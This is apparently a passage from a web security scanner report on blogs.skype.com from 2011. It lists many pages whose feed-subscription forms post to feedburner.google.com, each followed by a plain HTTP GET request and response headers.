<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/2011/08/using_skype_from_your_home_phone.html HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:40:43 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 65611 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/2011/09/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:40:42 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 61636 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/2011/09/introducing_skypesupport_on_tw.html HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:40:41 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 61925 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/advertising/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:40:56 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 80983 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/android/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:40:56 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 104201 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/apps/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:40:58 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 240757 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/blackberry/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:40:59 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 67973 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/brew/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:41:00 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 54209 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/campaigns_and_promotions/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:41:01 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 175514 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/careers/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:41:02 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 65154 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/comments.html HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:40:54 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 57205 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/corporate/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:41:03 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 169222 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/education/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:41:04 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 70824 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/enterprise/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:41:05 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 72288 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/entertainment/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:41:06 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 59910 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/events/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:41:07 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 115014 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/facebook/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:41:08 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 96175 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/html-guide.html HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:40:55 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 59019 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/insight/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:41:09 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 225293 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/iphone/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:41:10 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 84563 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/life_at_skype/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:41:11 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 114247 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/mac/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:41:12 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 102498 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/mobile/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:41:13 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 264936 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/mwc/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:41:14 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 60235 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/open_internet/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:41:15 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 105907 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/palm/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:41:15 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 59335 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/skype_on_your_tv/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:41:16 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 105119 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/social_good/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:41:17 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 72500 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/sony_ericsson/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:41:18 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 66399 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/subscriptions/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:41:19 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 107961 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/symbian/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:41:20 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 66381 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/verizon_wireless/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:41:21 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 97811 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/wifi/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:41:21 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 72889 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/windows/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:41:22 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 71552 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/windows_mobile/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:41:23 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 61123 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /enterprise/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:43:21 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 57644 Connection: close Content-Type: text/html; charset=UTF-8
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /es/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:43:14 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 57359 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /et/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:43:12 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 55910 Connection: close Content-Type: text/html; charset=UTF-8
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /fr/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:43:15 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 75359 Connection: close Content-Type: text/html; charset=UTF-8
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /garage/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:43:05 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 57867 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /it/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:43:15 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 55500 Connection: close Content-Type: text/html; charset=UTF-8
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /ja/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:43:12 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 60566 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /ko/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:43:17 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 54552 Connection: close Content-Type: text/html; charset=UTF-8
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /linux/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:43:07 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 136114 Connection: close Content-Type: text/html; charset=UTF-8
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /mac/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:43:05 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 54709 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /pl/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:43:18 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 58234 Connection: close Content-Type: text/html; charset=UTF-8
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /play/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:43:04 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 52934 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /pt/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:43:16 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 58394 Connection: close Content-Type: text/html; charset=UTF-8
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /ru/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:43:19 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 58654 Connection: close Content-Type: text/html; charset=UTF-8
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /security/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:43:07 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 52462 Connection: close Content-Type: text/html; charset=UTF-8
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /zh-Hans/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
